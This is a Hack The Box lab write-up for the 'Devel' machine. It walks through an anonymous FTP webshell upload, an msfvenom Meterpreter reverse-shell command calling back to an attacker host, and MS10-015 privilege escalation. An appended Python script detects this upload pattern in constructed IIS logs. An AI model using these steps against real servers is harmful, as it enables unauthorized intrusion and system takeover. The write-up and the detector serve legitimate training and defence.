Hack The Box —— Devel

Information Gathering

nmap

nmap -T4 -A -v 10.10.10.5

It was found that the server had ports 21 and 80 open, and that the FTP service could be accessed anonymously, but the version number was not known. Browsing to the HTTP service shows only the default IIS page.

Directory Scanning

Use the dirsearch tool to scan for directories:

python3 dirsearch.py -u http://10.10.10.5 -e html

Nothing of note was found.

FTP

Accessing the FTP service anonymously, I found that the current directory is writable, so I wanted to gain access to the server by uploading a webshell.

Exploitation

webshell

First, upload an ASPX webshell.

Requesting it in the browser shows that the webshell loads without error and can be executed.

Connect to it with Ant Sword.

When accessing some directories, I found that the permissions were insufficient.

Using the virtual terminal of Ant Sword, I executed whoami and found that I only had the permissions of the IIS user, so I looked for a way to escalate privileges.

Privilege Escalation

Use msfvenom to generate an exe payload, and use msf to receive the reverse shell, which makes privilege escalation easier:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f exe -o shell.exe

The generated shell.exe file is then uploaded to the target server through the Ant Sword and executed through the virtual terminal.

Use msf to listen on the port and receive the reverse shell.

Use the detection script that comes with msf to list vulnerabilities that may be usable for privilege escalation.

After testing them one by one, it was found that MS10-015 can be used to escalate privileges.

A new session was successfully created.

Execute the getuid command under meterpreter.

The privilege escalation was successful.

Next, you can get the flag with type c:\users\Administrator\Desktop\root.txt.txt.txt.
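
Added example, not part of the original post: the pattern in this write-up (an anonymous FTP upload of executable content into the web root, followed by HTTP requests to it) leaves a trace in both IIS logs, and the script below correlates them. The log lines are constructed, the field layout is a simplified W3C one, the anonymous user names are assumed values, and it assumes the FTP root is the web root as on this machine.

```python
# Added example: all log lines below are constructed for illustration.
EXEC_EXT = (".aspx", ".asp", ".ashx", ".asmx", ".exe")
ANON_USERS = ("anonymous", "ftp")  # assumed spellings of the anonymous account

# Constructed IIS FTP log (W3C extended format, reduced field set).
FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2019-08-14 08:30:11 192.0.2.50 anonymous STOR /shell.aspx 226
2019-08-14 08:31:02 192.0.2.50 anonymous RETR /welcome.png 226
2019-08-14 08:41:40 192.0.2.50 anonymous STOR /shell.exe 226
2019-08-14 09:02:13 192.0.2.77 deploy STOR /default.aspx 226
"""

# Constructed IIS HTTP log (W3C extended format, reduced field set).
HTTP_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2019-08-14 08:30:59 192.0.2.50 GET /shell.aspx 200
2019-08-14 08:31:20 192.0.2.50 POST /shell.aspx 200
2019-08-14 09:05:00 192.0.2.90 GET /default.aspx 200
"""

def parse_w3c(text):
    """Yield one dict per record, taking column names from the #Fields line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_ftp_dropped_executables(ftp_text, http_text):
    """Flag completed anonymous STORs of executable files; count later HTTP 2xx hits."""
    hits = {}
    for r in parse_w3c(http_text):
        if r["sc-status"].startswith("2"):
            hits.setdefault(r["cs-uri-stem"].lower(), []).append(r)
    findings = []
    for r in parse_w3c(ftp_text):
        path = r["cs-uri-stem"].lower()
        if (r["cs-method"] == "STOR" and r["sc-status"] == "226"
                and r["cs-username"].lower() in ANON_USERS
                and path.endswith(EXEC_EXT)):
            later = [h for h in hits.get(path, [])
                     if (h["date"], h["time"]) >= (r["date"], r["time"])]
            findings.append({"path": path, "uploader": r["c-ip"],
                             "http_requests": len(later)})
    return findings

if __name__ == "__main__":
    for finding in find_ftp_dropped_executables(FTP_LOG, HTTP_LOG):
        print(finding)
```

Any finding is worth an alert on its own; a non-zero http_requests count means the uploaded file was also served. The underlying fix is to disable anonymous write access and keep the FTP root out of the web root.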
